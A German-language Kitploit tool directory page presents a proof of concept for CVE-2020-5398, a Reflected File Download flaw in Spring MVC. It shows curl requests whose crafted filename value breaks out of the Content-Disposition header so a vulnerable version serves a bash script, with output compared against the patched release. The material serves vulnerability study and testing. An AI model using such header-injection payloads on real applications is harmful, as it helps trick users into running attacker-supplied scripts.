Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-5398 — CVE-2020-5398 - RFD (Reflected File Download) Angriff für Spring MVC | Kitploit
Tools/GitHubGitHub/motikan2010/cve-2020-5398
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubmotikan2010/cve-2020-5398

CVE-2020-5398

CVE-2020-5398 - RFD (Reflected File Download) Angriff für Spring MVC

Repository anzeigen
8418vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-5398 - RFD (Reflected File Download) Angriff auf Spring MVC

In Spring Framework, Versionen 5.2.x vor 5.2.3, Versionen 5.1.x vor 5.1.13 und Versionen 5.0.x vor 5.0.16 ist eine Anwendung anfällig für einen Reflected File Download (RFD) Angriff, wenn sie einen „Content-Disposition“-Header in der Antwort setzt, wobei das filename-Attribut aus Benutzereingaben abgeleitet wird.

Verwendung

root@kitploit:~
./gradlew bootrun

Lauscht auf 127.0.0.1:8080.

root@kitploit:~
$ curl 'http://127.0.0.1:8080/?filename=sample&contents=Hello,%20World' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.txt"
Content-Type: application/octet-stream
Content-Length: 12
Date: Fri, 17 Jan 2020 05:41:08 GMT

Hello, World

Startet den Download der Datei sample.txt.

PoC

Unsichere Version (Spring Web 5.2.2)

root@kitploit:~
curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:22:18 GMT

#!/bin/bash
id

Startet den Download der Datei sample.sh. (Shell-Datei)

Sichere Version (Spring Web 5.2.3)

root@kitploit:~
$ curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh\";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:24:47 GMT

#!/bin/bash
id

Startet den Download der Datei sample.sh";.txt. (Textdatei)

Referenzen

  • CVE-2020-5398: RFD-Angriff über den „Content-Disposition“-Header aus der Anfrageeingabe einer Spring MVC oder Spring WebFlux Anwendung | Sicherheit | Pivotal
  • NVD - CVE-2020-5398
  • Was ist ein RFD-Angriff?
    • eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
    • Reflected File Download - OWASP
  • Fix Commit
    • ContentDisposition refactoring · spring-projects/spring-framework@956ffe6
Tool herunterladen